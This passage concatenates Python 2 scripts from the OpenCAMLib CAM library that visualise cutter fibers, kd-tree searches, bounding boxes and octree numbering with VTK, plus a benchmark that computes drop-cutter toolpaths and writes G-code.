con1 = camvtk.Cone(center=(a.x,a.y,a.z), radius=diameter/2, height = 0.3, color=camvtk.lgreen )
myscreen.addActor(con1)
con2 = camvtk.Cone(center=(b.x,b.y,b.z), radius=diameter/2, height = 0.3, color=camvtk.pink )
myscreen.addActor(con2)
print "done."
myscreen.camera.SetPosition(4, 3, 2)
myscreen.camera.SetFocalPoint(0, 0, 0)
myscreen.render()
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
#for n in range(1,18):
# t.SetText("OpenCAMLib " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
# myscreen.camera.Azimuth( 2 )
# time.sleep(0.1)
# myscreen.render()
# w2if.Modified()
# lwr.SetFileName("frames/tc"+ ('%04d' % n)+".png")
#lwr.Write()
myscreen.iren.Start()
#raw_input("Press Enter to terminate")
```
#### File: scripts/fiber/fiber_15_conecutter_anim.py
```python
import ocl
import camvtk
import time
import vtk
import datetime
import math
import os
def drawFiber_clpts(myscreen, f, fibercolor=camvtk.red):
inter = f.getInts()
#print "fiber has ", len(inter) , " intervals"
for i in inter:
if not i.empty():
ip1 = f.point( i.lower )
ip2 = f.point( i.upper )
#myscreen.addActor( camvtk.Line(p1=(ip1.x,ip1.y,ip1.z),p2=(ip2.x,ip2.y,ip2.z), color=fibercolor) )
myscreen.addActor( camvtk.Sphere(center=(ip1.x,ip1.y,ip1.z),radius=0.005, color=camvtk.clColor( i.lower_cc) ) )
myscreen.addActor( camvtk.Sphere(center=(ip2.x,ip2.y,ip2.z),radius=0.005, color=camvtk.clColor( i.upper_cc) ) )
#cc1 = i.lower_cc
#cc2 = i.upper_cc
#myscreen.addActor( camvtk.Sphere(center=(cc1.x,cc1.y,cc1.z),radius=0.005, color=camvtk.pink ) )
#myscreen.addActor( camvtk.Sphere(center=(cc2.x,cc2.y,cc2.z),radius=0.005, color=camvtk.pink ) )
# colors from camvtk.py:
# ocl.CCType.VERTEX: col = red
# ocl.CCType.EDGE_HORIZ: col = orange
# ocl.CCType.EDGE_SHAFT: col = mag
def yfiber(cutter,yvals,t,zh,myscreen):
for y in yvals:
f1 = ocl.Point(-5.5,y,zh) # start point of fiber
f2 = ocl.Point(5.5,y,zh) # end point of fiber
f = ocl.Fiber( f1, f2)
i = ocl.Interval()
cutter.pushCutter(f,i,t)
f.addInterval(i)
drawFiber_clpts(myscreen, f, camvtk.red)
def xfiber(cutter,xvals,t,zh,myscreen):
for x in xvals:
f1 = ocl.Point(x,-5.5,zh) # start point of fiber
f2 = ocl.Point(x,5.5,zh) # end point of fiber
f = ocl.Fiber( f1, f2)
i = ocl.Interval()
cutter.pushCutter(f,i,t)
f.addInterval(i)
drawFiber_clpts(myscreen, f, camvtk.lblue)
def drawScreen(a,b,c,filename,write_flag):
print ocl.revision()
myscreen = camvtk.VTKScreen()
z_hi = a.z
if b.z > z_hi:
z_hi = b.z
if c.z > z_hi:
z_hi = c.z
z_lo = a.z
if b.z < z_lo:
z_lo = b.z
if c.z < z_lo:
z_lo = c.z
#z_hi = 0.3 # this is the shallow case
#ztri = 0.8 # this produces the steep case where we hit the circular rim
#z_lo = 0.1
#a = ocl.Point(0,1,ztri)
#b = ocl.Point(1,0.5,ztri)
#c = ocl.Point(0.2,0.2,ztri_lo)
myscreen.addActor(camvtk.Point(center=(a.x,a.y,a.z), color=(1,0,1)))
myscreen.addActor(camvtk.Point(center=(b.x,b.y,b.z), color=(1,0,1)))
myscreen.addActor(camvtk.Point(center=(c.x,c.y,c.z), color=(1,0,1)))
myscreen.addActor( camvtk.Line(p1=(a.x,a.y,a.z),p2=(c.x,c.y,c.z)) )
myscreen.addActor( camvtk.Line(p1=(c.x,c.y,c.z),p2=(b.x,b.y,b.z)) )
myscreen.addActor( camvtk.Line(p1=(a.x,a.y,a.z),p2=(b.x,b.y,b.z)) )
t = ocl.Triangle(b,c,a)
angle = math.pi/5
diameter=0.3
length=5
#cutter = ocl.BallCutter(diameter, length)
#cutter = ocl.CylCutter(diameter, length)
#cutter = ocl.BullCutter(diameter, diameter/4, length)
cutter = ocl.ConeCutter(diameter, angle, length)
#cutter = cutter.offsetCutter( 0.1 )
print "cutter= ", cutter
print "length=", cutter.getLength()
print "fiber..."
range=2
Nmax = 100
yvals = [float(n-float(Nmax)/2)/Nmax*range for n in xrange(0,Nmax+1)]
xvals = [float(n-float(Nmax)/2)/Nmax*range for n in xrange(0,Nmax+1)]
zmin = z_lo - 0.3
zmax = z_hi
zNmax = 20
dz = (zmax-zmin)/(zNmax-1)
zvals=[]
for n in xrange(0,zNmax):
zvals.append(zmin+n*dz)
for zh in zvals:
yfiber(cutter,yvals,t,zh,myscreen)
xfiber(cutter,xvals,t,zh,myscreen)
print "done."
myscreen.camera.SetPosition(-2, -1, 3)
myscreen.camera.SetFocalPoint(1.0, 0.0, -0.5)
camvtk.drawArrows(myscreen,center=(-0.5,-0.5,-0.5))
camvtk.drawOCLtext(myscreen)
myscreen.render()
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
w2if.Modified()
lwr.SetFileName(filename)
if write_flag:
lwr.Write()
print "wrote ",filename
#myscreen.iren.Start()
#raw_input("Press Enter to terminate")
if __name__ == "__main__":
ztri = 0.3 # this is the shallow case
#ztri = 0.8 # this produces the steep case where we hit the circular rim
ztri_lo = 0.1
Nmax = 300
thetamax = 2*math.pi
for n in xrange(0,Nmax):
theta=thetamax/Nmax
a = ocl.Point(0,1,ztri)
a.xRotate(theta*n)
b = ocl.Point(1,0.0,0)
b.xRotate(theta*n)
c = ocl.Point(0.2,0.0,ztri)
c.xRotate(theta*n)
current_dir = os.getcwd()
filename = current_dir + "/frames/conecutter_"+ ('%05d' % n)+".png"
drawScreen(a,b,c,filename, 1)
```
#### File: opencamlib/scripts/kdtree_debug_0.py
```python
import ocl as cam
import camvtk
import time
import vtk
import math
import datetime
def main():
myscreen = camvtk.VTKScreen()
focal = cam.Point(5, 5, 0)
r = 30
theta = (float(45)/360)*2*math.pi
fi=45
campos = cam.Point( r*math.sin(theta)*math.cos(fi), r*math.sin(theta)*math.sin(fi), r*math.cos(theta) )
myscreen.camera.SetPosition(campos.x, campos.y, campos.z)
myscreen.camera.SetFocalPoint(focal.x,focal.y, focal.z)
t = camvtk.Text()
t.SetPos( (myscreen.width-450, myscreen.height-30) )
myscreen.addActor( t)
t2 = camvtk.Text()
ytext = "kd-tree debug" #"Y: %3.3f" % (ycoord)
t2.SetText(ytext)
t2.SetPos( (50, myscreen.height-50) )
myscreen.addActor( t2)
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
epos = cam.Epos()
epos.setS(0,1)
t.SetText("OpenCAMLib 10.03-beta, " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
#ycoord = 1.1
stl = camvtk.STLSurf(filename="../stl/demo.stl")
#stl = camvtk.STLSurf(filename="../stl/demo2.stl")
print "STL surface read"
#myscreen.addActor(stl)
#stl.SetWireframe()
#stl.SetColor((0.5,0.5,0.5))
polydata = stl.src.GetOutput()
s= cam.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STLSurf with ", s.size(), " triangles"
myscreen.addActor( camvtk.Sphere( center=(0,0,0), radius=0.2, color = camvtk.yellow ) )
s.build_kdtree()
print "built kd-tree"
s.jump_kd_reset()
tlist = s.get_kd_triangles()
print "got", len(tlist), " triangles"
while (s.jump_kd_hi()):
lotris = s.get_kd_triangles()
s.jump_kd_up()
cut = s.get_kd_cut()
s.jump_kd_lo()
hitris = s.get_kd_triangles()
lev = s.get_kd_level()
print "l=", lev, " hi=", len(hitris), " lo=", len(lotris), " cut=", cut
if ( cut[0] < 2 ):
print "x cut ",
if ( cut[0] == 0):
print "max"
myscreen.addActor( camvtk.Line( p1=(cut[1],100,0), p2=(cut[1],-100,0), color = camvtk.green ) )
else:
print "min"
myscreen.addActor( camvtk.Line( p1=(cut[1],100,0), p2=(cut[1],-100,0), color = camvtk.lgreen ) )
#myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.red ) )
else:
print "y cut ",
if ( cut[0] == 2):
print "max"
myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.red ) )
else:
print "min"
myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.pink ) )
slo = camvtk.STLSurf(triangleList=lotris)
slo.SetColor(camvtk.pink)
slo.SetWireframe()
shi = camvtk.STLSurf(triangleList=hitris)
shi.SetColor(camvtk.lgreen)
shi.SetWireframe()
myscreen.addActor(slo)
myscreen.addActor(shi)
myscreen.render()
myscreen.iren.Start()
raw_input("Press Enter to terminate")
time.sleep(1)
myscreen.removeActor(slo)
myscreen.removeActor(shi)
print "done."
myscreen.render()
#lwr.SetFileName(filename)
#raw_input("Press Enter to terminate")
time.sleep(0.2)
lwr.Write()
myscreen.iren.Start()
if __name__ == "__main__":
main()
#raw_input("Press Enter to terminate")
```
#### File: opencamlib/scripts/kdtree_debug_3.py
```python
import ocl as cam
import camvtk
import time
import vtk
import math
import datetime
def kdtreesearch(myscreen, tlist, s, cutter, cl, depth):
#print "surface=", s.str()
#print "cutter=", cutter.str()
#print "cl=", cl.str()
myscreen.render()
#raw_input("Press Enter to terminate")
#time.sleep(1)
if (depth==1): # stop jumping and return all triangles
tris = s.get_kd_triangles()
for t in tris:
tlist.append(t)
return
# jump high or low depending on search
cut = s.get_kd_cut()
print "cutvalues: ", cut
dim = cut[0]
cval = cut[1]
if dim == 0: # cut along xmax
print cval, " < ", cl.x - cutter.radius, " ??"
if ( cval < ( cl.x - cutter.radius) ):
myscreen.addActor( camvtk.Line( p1=(cval,100,0), p2=(cval,-100,0), color = camvtk.green ) )
s.jump_kd_lo()
trilist = s.get_kd_triangles()
drawtriangles(myscreen, trilist, camvtk.blue)
s.jump_kd_up()
print "xmax: jump ONLY hi"
s.jump_kd_hi()
print "search hi at level=", s.get_kd_level()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
print "len tlist=", len(tlist), " now level=", s.get_kd_level()
else:
#print "xmax: jump both hi and lo"
s.jump_kd_hi()
#print "search hi at level=", s.get_kd_level()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
#print "len tlist=", len(tlist), " now level=", s.get_kd_level()
s.jump_kd_up()
s.jump_kd_lo()
#print "search lo at level=", s.get_kd_level()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
#print "len tlist=", len(tlist), " now level=", s.get_kd_level()
if dim == 1:
print cval, " > ", cl.x + cutter.radius, " ??"
if ( cval > ( cl.x + cutter.radius) ):
myscreen.addActor( camvtk.Line( p1=(cval,100,0), p2=(cval,-100,0), color = camvtk.lgreen ) )
s.jump_kd_hi()
trilist = s.get_kd_triangles()
drawtriangles(myscreen, trilist, camvtk.blue)
s.jump_kd_up()
print "xmin: jump only lo"
s.jump_kd_lo()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
else:
#print "xmin: jump both hi and lo"
s.jump_kd_lo()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
s.jump_kd_up()
s.jump_kd_hi()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
if dim == 2:
print cval, " < ", cl.y - cutter.radius, " ??"
if ( cval < ( cl.y - cutter.radius) ):
myscreen.addActor( camvtk.Line( p1=(100,cval,0), p2=(-100,cval,0), color = camvtk.red ) )
s.jump_kd_lo()
trilist = s.get_kd_triangles()
drawtriangles(myscreen, trilist, camvtk.yellow)
s.jump_kd_up()
s.jump_kd_hi()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
else:
#print "ymax: jump both hi and lo"
s.jump_kd_lo()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
s.jump_kd_up()
s.jump_kd_hi()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
if dim == 3: # cut along ymin
print cval, " > ", cl.y + cutter.radius, " ??"
if ( cval > ( cl.y + cutter.radius) ):
myscreen.addActor( camvtk.Line( p1=(100,cval,0), p2=(-100,cval,0), color = camvtk.pink ) )
s.jump_kd_hi()
trilist = s.get_kd_triangles()
drawtriangles(myscreen, trilist, camvtk.yellow)
s.jump_kd_up()
print "ymin: jump ONLY lo"
s.jump_kd_lo()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
else:
#print "ymin: jump both hi and lo"
s.jump_kd_hi()
#print "search hi at level=", s.get_kd_level()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
#print "len tlist=", len(tlist), " now level=", s.get_kd_level()
s.jump_kd_up()
s.jump_kd_lo()
#print "search lo at level=", s.get_kd_level()
kdtreesearch(myscreen, tlist, s, cutter, cl, depth-1)
return
def drawtriangles(myscreen, trilist, color):
cpp = camvtk.STLSurf(triangleList=trilist)
cpp.SetColor(color)
cpp.SetWireframe()
myscreen.addActor(cpp)
def drawcuts(myscreen, s):
cut = s.get_kd_cut()
if ( cut[0] < 2 ):
print "x cut ",
if ( cut[0] == 0):
print "max"
myscreen.addActor( camvtk.Line( p1=(cut[1],100,0), p2=(cut[1],-100,0), color = camvtk.green ) )
else:
print "min"
myscreen.addActor( camvtk.Line( p1=(cut[1],100,0), p2=(cut[1],-100,0), color = camvtk.lgreen ) )
else:
print "y cut ",
if ( cut[0] == 2):
print "max"
myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.red ) )
else:
print "min"
myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.pink ) )
if (s.jump_kd_hi()):
drawcuts(myscreen, s)
s.jump_kd_up()
if (s.jump_kd_lo()):
drawcuts(myscreen, s)
s.jump_kd_up()
return
def main():
myscreen = camvtk.VTKScreen()
focal = cam.Point(50, 0, 0)
r = 300
theta = (float(45)/360)*2*math.pi
fi=45
campos = cam.Point( r*math.sin(theta)*math.cos(fi), r*math.sin(theta)*math.sin(fi), r*math.cos(theta) )
myscreen.camera.SetPosition(campos.x, campos.y, campos.z)
myscreen.camera.SetFocalPoint(focal.x,focal.y, focal.z)
t = camvtk.Text()
t.SetPos( (myscreen.width-450, myscreen.height-30) )
myscreen.addActor( t)
t2 = camvtk.Text()
ytext = "kd-tree debug" #"Y: %3.3f" % (ycoord)
t2.SetText(ytext)
t2.SetPos( (50, myscreen.height-50) )
myscreen.addActor( t2)
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
epos = cam.Epos()
epos.setS(0,1)
t.SetText("OpenCAMLib 10.04-beta, " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
#ycoord = 1.1
stl = camvtk.STLSurf(filename="../stl/carpet2.stl")
#stl = camvtk.STLSurf(filename="demo2.stl")
print "STL surface read"
myscreen.addActor(stl)
stl.SetWireframe()
stl.SetColor((0.5,0.5,0.5))
polydata = stl.src.GetOutput()
s= cam.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STLSurf with ", s.size(), " triangles"
cutterDiameter=7
cutter = cam.CylCutter(cutterDiameter)
cl = cam.Point(31, 42, 3)
cutactor = camvtk.Cylinder(center=(cl.x,cl.y,cl.z),
radius=cutterDiameter/2,
height=2,
rotXYZ=(90,0,0),
color=camvtk.green)
myscreen.addActor( cutactor )
# sphere to see (0,0)
myscreen.addActor( camvtk.Sphere( center=(0,0,0), radius=0.2, color = camvtk.yellow ) )
s.build_kdtree()
print "built kd-tree"
s.jump_kd_reset()
cpp_tlist = s.getTrianglesUnderCutter(cl, cutter)
py_tlist = []
depth = 6
kdtreesearch(myscreen, py_tlist, s, cutter, cl, depth)
print "len(cpp_list) after search=", len(cpp_tlist)
print "len(py_list) after search=", len(py_tlist)
cpp = camvtk.STLSurf(triangleList=cpp_tlist)
cpp.SetColor(camvtk.lgreen)
cpp.SetWireframe()
myscreen.addActor(cpp)
py = camvtk.STLSurf(triangleList=py_tlist)
py.SetColor(camvtk.pink)
py.SetWireframe()
myscreen.addActor(py)
#drawcuts(myscreen, s)
myscreen.render()
myscreen.iren.Start()
time.sleep(2)
exit()
tlist = s.get_kd_triangles()
print "got", len(tlist), " triangles"
while (s.jump_kd_hi()):
lotris = s.get_kd_triangles()
s.jump_kd_up()
cut = s.get_kd_cut()
s.jump_kd_lo()
hitris = s.get_kd_triangles()
lev = s.get_kd_level()
print "l=", lev, " hi=", len(hitris), " lo=", len(lotris), " cut=", cut
if ( cut[0] < 2 ):
print "x cut ",
if ( cut[0] == 0):
print "max"
myscreen.addActor( camvtk.Line( p1=(cut[1],100,0), p2=(cut[1],-100,0), color = camvtk.green ) )
else:
print "min"
myscreen.addActor( camvtk.Line( p1=(cut[1],100,0), p2=(cut[1],-100,0), color = camvtk.lgreen ) )
else:
print "y cut ",
if ( cut[0] == 2):
print "max"
myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.red ) )
else:
print "min"
myscreen.addActor( camvtk.Line( p1=(100,cut[1],0), p2=(-100,cut[1],0), color = camvtk.pink ) )
slo = camvtk.STLSurf(triangleList=lotris)
slo.SetColor(camvtk.pink)
slo.SetWireframe()
shi = camvtk.STLSurf(triangleList=hitris)
shi.SetColor(camvtk.lgreen)
shi.SetWireframe()
myscreen.addActor(slo)
myscreen.addActor(shi)
myscreen.render()
#myscreen.iren.Start()
#raw_input("Press Enter to terminate")
time.sleep(1)
myscreen.removeActor(slo)
myscreen.removeActor(shi)
print "done."
myscreen.render()
#lwr.SetFileName(filename)
#raw_input("Press Enter to terminate")
time.sleep(0.2)
lwr.Write()
myscreen.iren.Start()
if __name__ == "__main__":
main()
#raw_input("Press Enter to terminate")
```
#### File: opencamlib/scripts/ocl_bounding-box.py
```python
import ocl
import camvtk
import time
import vtk
import datetime
import math
def drawBB(myscreen, bb):
lines=[]
# x-direction lines, red color
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.minpt.y, bb.minpt.z), p2=(bb.maxpt.x, bb.minpt.y, bb.minpt.z), color=camvtk.red) )
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.maxpt.y, bb.minpt.z), p2=(bb.maxpt.x, bb.maxpt.y, bb.minpt.z), color=camvtk.red) )
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.minpt.y, bb.maxpt.z), p2=(bb.maxpt.x, bb.minpt.y, bb.maxpt.z), color=camvtk.red) )
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.maxpt.y, bb.maxpt.z), p2=(bb.maxpt.x, bb.maxpt.y, bb.maxpt.z), color=camvtk.red) )
# y-direction lines, green color
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.minpt.y, bb.minpt.z), p2=(bb.minpt.x, bb.maxpt.y, bb.minpt.z), color=camvtk.green) )
lines.append( camvtk.Line( p1=(bb.maxpt.x, bb.minpt.y, bb.minpt.z), p2=(bb.maxpt.x, bb.maxpt.y, bb.minpt.z), color=camvtk.green) )
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.minpt.y, bb.maxpt.z), p2=(bb.minpt.x, bb.maxpt.y, bb.maxpt.z), color=camvtk.green) )
lines.append( camvtk.Line( p1=(bb.maxpt.x, bb.minpt.y, bb.maxpt.z), p2=(bb.maxpt.x, bb.maxpt.y, bb.maxpt.z), color=camvtk.green) )
# z-direction lines, blue color
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.minpt.y, bb.minpt.z), p2=(bb.minpt.x, bb.minpt.y, bb.maxpt.z), color=camvtk.blue) )
lines.append( camvtk.Line( p1=(bb.maxpt.x, bb.minpt.y, bb.minpt.z), p2=(bb.maxpt.x, bb.minpt.y, bb.maxpt.z), color=camvtk.blue) )
lines.append( camvtk.Line( p1=(bb.minpt.x, bb.maxpt.y, bb.minpt.z), p2=(bb.minpt.x, bb.maxpt.y, bb.maxpt.z), color=camvtk.blue) )
lines.append( camvtk.Line( p1=(bb.maxpt.x, bb.maxpt.y, bb.minpt.z), p2=(bb.maxpt.x, bb.maxpt.y, bb.maxpt.z), color=camvtk.blue) )
for l in lines:
myscreen.addActor(l)
if __name__ == "__main__":
print ocl.revision()
myscreen = camvtk.VTKScreen()
stl = camvtk.STLSurf("../stl/gnu_tux_mod.stl")
#stl = camvtk.STLSurf("../stl/beet_mm.stl")
#stl = camvtk.STLSurf("../stl/Blade.stl")
myscreen.addActor(stl)
stl.SetWireframe()
stl.SetColor((0.5,0.5,0.5))
polydata = stl.src.GetOutput()
s = ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STL surface read ", s.size(), " triangles"
minimum_point = s.bb.minpt
maximum_point = s.bb.maxpt
print "min point =", minimum_point
print "max point =", maximum_point
print s.getBounds()
# render the min and max points
myscreen.addActor( camvtk.Sphere( center=(minimum_point.x, minimum_point.y, minimum_point.z), radius=0.1, color=camvtk.red) )
myscreen.addActor( camvtk.Sphere( center=(maximum_point.x, maximum_point.y, maximum_point.z), radius=0.1, color=camvtk.green) )
# render a bounding-box
drawBB( myscreen, s.bb )
myscreen.camera.SetPosition(3, 23, 15)
myscreen.camera.SetFocalPoint(4, 5, 0)
t = camvtk.Text()
t.SetText("OpenCAMLib")
t.SetPos( (myscreen.width-200, myscreen.height-30) )
myscreen.addActor( t)
myscreen.render()
myscreen.iren.Start()
raw_input("Press Enter to terminate")
```
#### File: opencamlib/scripts/octree_fig.py
```python
import ocl
import pyocl
import camvtk
import time
import datetime
import vtk
import math
"""
This script draws a picture which enumerates the vertices, edges, and faces
of an octree node, as used in the octree cutting simulation and
marching-cubes.
"""
def main():
print ocl.revision()
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(-8, -4, 25)
myscreen.camera.SetFocalPoint(0,0, 0)
arpos=-1.5
camvtk.drawArrows(myscreen,center=(arpos,arpos,arpos))
camvtk.drawOCLtext(myscreen)
octtext = camvtk.Text()
octtext.SetPos( (70, myscreen.height-600) )
myscreen.addActor( octtext)
octtext.SetText("Octree")
vertex = [ ocl.Point( 1, 1,-1), #// 0
ocl.Point(-1, 1,-1), #// 1
ocl.Point(-1,-1,-1), #// 2
ocl.Point( 1,-1,-1), #// 3
ocl.Point( 1, 1, 1), #// 4
ocl.Point(-1, 1, 1), #// 5
ocl.Point(-1,-1, 1), #// 6
ocl.Point( 1,-1, 1) #// 7
]
n=0
for v in vertex:
myscreen.addActor( camvtk.Sphere(center=(v.x,v.y,v.z), radius=0.1,color=camvtk.red))
v=v
t = camvtk.Text3D(color=camvtk.red, center=(v.x+0.1,v.y+0.1,v.z), text=str(n), scale=0.2, camera=myscreen.camera)
myscreen.addActor(t)
n=n+1
edgeTable = [ [0,1] ,
[1,2] ,
[2,3] ,
[3,0] ,
[4,5] ,
[5,6] ,
[6,7] ,
[7,4] ,
[0,4] ,
[1,5] ,
[2,6] ,
[3,7] ,
]
# draw the edges as tubes
ne = 0
for e in edgeTable:
ep1 = vertex[ e[0] ]
ep2 = vertex[ e[1] ]
tu = camvtk.Tube( p1=(ep1.x,ep1.y,ep1.z), p2=(ep2.x,ep2.y,ep2.z), radius=0.051, color=camvtk.green )
myscreen.addActor(tu)
mid = 0.5*(ep1 + ep2)
t = camvtk.Text3D(color=camvtk.green, center=(mid.x+0.1,mid.y+0.1,mid.z), text=str(ne), scale=0.2, camera=myscreen.camera)
myscreen.addActor(t)
ne=ne+1
# number the faces
face = [ [2,3,6,7] ,
[0,3,4,7] ,
[0,1,4,5] ,
[1,2,5,6] ,
[0,1,2,3] ,
[4,5,6,7] ,
]
nf=0
for f in face:
mid = ocl.Point()
for v in f:
mid = mid+vertex[v]
mid=0.25*mid
t = camvtk.Text3D(color=camvtk.blue, center=(mid.x,mid.y,mid.z), text=str(nf), scale=0.2, camera=myscreen.camera)
myscreen.addActor(t)
nf=nf+1
myscreen.render()
print "All done."
myscreen.iren.Start()
if __name__ == "__main__":
main()
```
#### File: opencamlib/scripts/pycam_bench.py
```python
import ocl
import camvtk
import time
import vtk
import ngc_writer  # G-code writer helper used by drawPaths(); assumed importable from this script's directory
def filter_path(path,tol):
f = ocl.LineCLFilter()
f.setTolerance(tol)
for p in path:
p2 = ocl.CLPoint(p.x,p.y,p.z)
f.addCLPoint(p2)
f.run()
return f.getCLPoints()
def adaptive_path_drop_cutter(s, cutter, path):
apdc = ocl.AdaptivePathDropCutter()
apdc.setSTL(s)
apdc.setCutter(cutter)
# set the minimum Z-coordinate, or "floor" for drop-cutter
#apdc.minimumZ = -1
apdc.setSampling(0.04)
apdc.setMinSampling(0.0008)
apdc.setPath( path )
apdc.run()
return apdc.getCLPoints()
def drawPaths(paths):
ngc_writer.preamble()
for path in paths:
ngc_writer.pen_up()
first_pt = path[0]
ngc_writer.xy_rapid_to( first_pt.x, first_pt.y )
ngc_writer.pen_down( first_pt.z )
for p in path[1:]:
ngc_writer.line_to(p.x,p.y,p.z)
ngc_writer.postamble()
if __name__ == "__main__":
print ocl.version()
myscreen = camvtk.VTKScreen()
#stl = camvtk.STLSurf("../stl/demo.stl")
stl = camvtk.STLSurf("../stl/pycam-textbox.stl")
print "STL surface read"
myscreen.addActor(stl)
stl.SetWireframe()
polydata = stl.src.GetOutput()
s= ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STLSurf with ", s.size(), " triangles"
print s.getBounds()
# define a cutter
cutter = ocl.CylCutter(10, 50) # diameter, length
#cutter = ocl.BullCutter(0.6, 0.01, 5)
print cutter
#pdc = ocl.PathDropCutter() # create a pdc
apdc = ocl.AdaptivePathDropCutter()
#pdc.setSTL(s)
apdc.setSTL(s)
#pdc.setCutter(cutter) # set the cutter
apdc.setCutter(cutter)
#print "set minimumZ"
#pdc.minimumZ = -1 # set the minimum Z-coordinate, or "floor" for drop-cutter
#apdc.minimumZ = -1
#print "set the sampling interval"
#pdc.setSampling(0.4)
apdc.setSampling(0.4)
apdc.setMinSampling(0.0008)
print " apdc sampling = ", apdc.getSampling()
ymin=0
ymax=50
Ny=40 # number of lines in the y-direction
dy = float(ymax-ymin)/(Ny-1) # the y step-over
# create a simple "Zig" pattern where we cut only in one direction.
paths = []
# create a list of paths
for n in xrange(0,Ny):
path = ocl.Path()
y = ymin+n*dy # current y-coordinate
p1 = ocl.Point(0,y,0) # start-point of line
p2 = ocl.Point(130,y,0) # end-point of line
l = ocl.Line(p1,p2) # line-object
path.append( l ) # add the line to the path
paths.append(path)
cl_paths=[]
# we now have a list of paths to run through apdc
t_before = time.time()
n_aclp=0
for p in paths:
aclp = adaptive_path_drop_cutter(s,cutter,p) # the output is a list of Cutter-Locations
n_aclp = n_aclp + len(aclp)
cl_paths.append(aclp)
t_after = time.time()
print "( OpenCamLib::AdaptivePathDropCutter run took %.2f s )" % ( t_after-t_before )
print "( got %d raw CL-points )" % ( n_aclp )
# to reduce the G-code size we filter here. (this is not strictly required and could be omitted)
# we could potentially detect G2/G3 arcs here, if there was a filter for that.
tol = 0.001
print "( filtering to tolerance %.4f )" % ( tol )
cl_filtered_paths = []
t_before = time.time()
n_filtered=0
for cl_path in cl_paths:
cl_filtered = filter_path(cl_path,tol)
n_filtered = n_filtered + len(cl_filtered)
cl_filtered_paths.append(cl_filtered)
t_after = time.time()
calctime = t_after-t_before
print "( got %d filtered CL-points. Filter done in %.3f s )" % ( n_filtered , calctime )
drawPaths(cl_filtered_paths)
"""
# some parameters for this "zigzig" pattern
ymin=0
ymax=50
Ny=10 # number of lines in the y-direction
dy = float(ymax-ymin)/Ny # the y step-over
print "step-over ",dy
#path = ocl.Path() # create an empty path object
path2 = ocl.Path()
# add Line objects to the path in this loop
for n in xrange(0,Ny):
y = ymin+n*dy
p1 = ocl.Point(0,y,-100) # start-point of line
p2 = ocl.Point(130,y,-100) # end-point of line
#sl = ocl.Line(p1,p2) # line-object
l2 = ocl.Line(p1,p2)
#path.append( l ) # add the line to the path
path2.append( l2 )
print " set the path for pdf "
#pdc.setPath( path )
apdc.setPath( path2 )
#print " run the calculation "
#t_before = time.time()
#pdc.run() # run drop-cutter on the path
#t_after = time.time()
#print " pdc run took ", t_after-t_before," s"
print " run the calculation "
t_before = time.time()
apdc.run() # run drop-cutter on the path
t_after = time.time()
print " apdc run took ", t_after-t_before," s"
print "get the results "
#clp = pdc.getCLPoints() # get the cl-points from pdf
aclp = apdc.getCLPoints()
print "got ", len(aclp) ," adaptive points"
#aclp_lifted=[]
#for p in aclp:
# p2 = ocl.Point(p.x,p.y,p.z) + ocl.Point(0,0,1)
# aclp_lifted.append(p2)
# filter the adaptively sampled toolpaths
print "filtering. before filter we have", len(aclp),"cl-points"
t_before = time.time()
f = ocl.LineCLFilter()
f.setTolerance(0.001)
for p in aclp:
p2 = ocl.CLPoint(p.x,p.y,p.z)
f.addCLPoint(p2)
f.run()
t_after = time.time()
calctime = t_after-t_before
print " done in ", calctime," s"
cl_filtered = f.getCLPoints()
#aclp_lifted2=[]
#for p in cl_filtered:
# p2 = ocl.Point(p.x,p.y,p.z) + ocl.Point(0,0,1)
# aclp_lifted2.append(p2)
print " render the CL-points"
#camvtk.drawCLPointCloud(myscreen, clp)
camvtk.drawCLPointCloud(myscreen, cl_filtered)
for p in cl_filtered:
myscreen.
"""
#camvtk.drawCLPointCloud(myscreen, aclp_lifted2)
#myscreen.addActor( camvtk.PointCloud(pointlist=clp, collist=ccp) )
myscreen.camera.SetPosition(3, 23, 15)
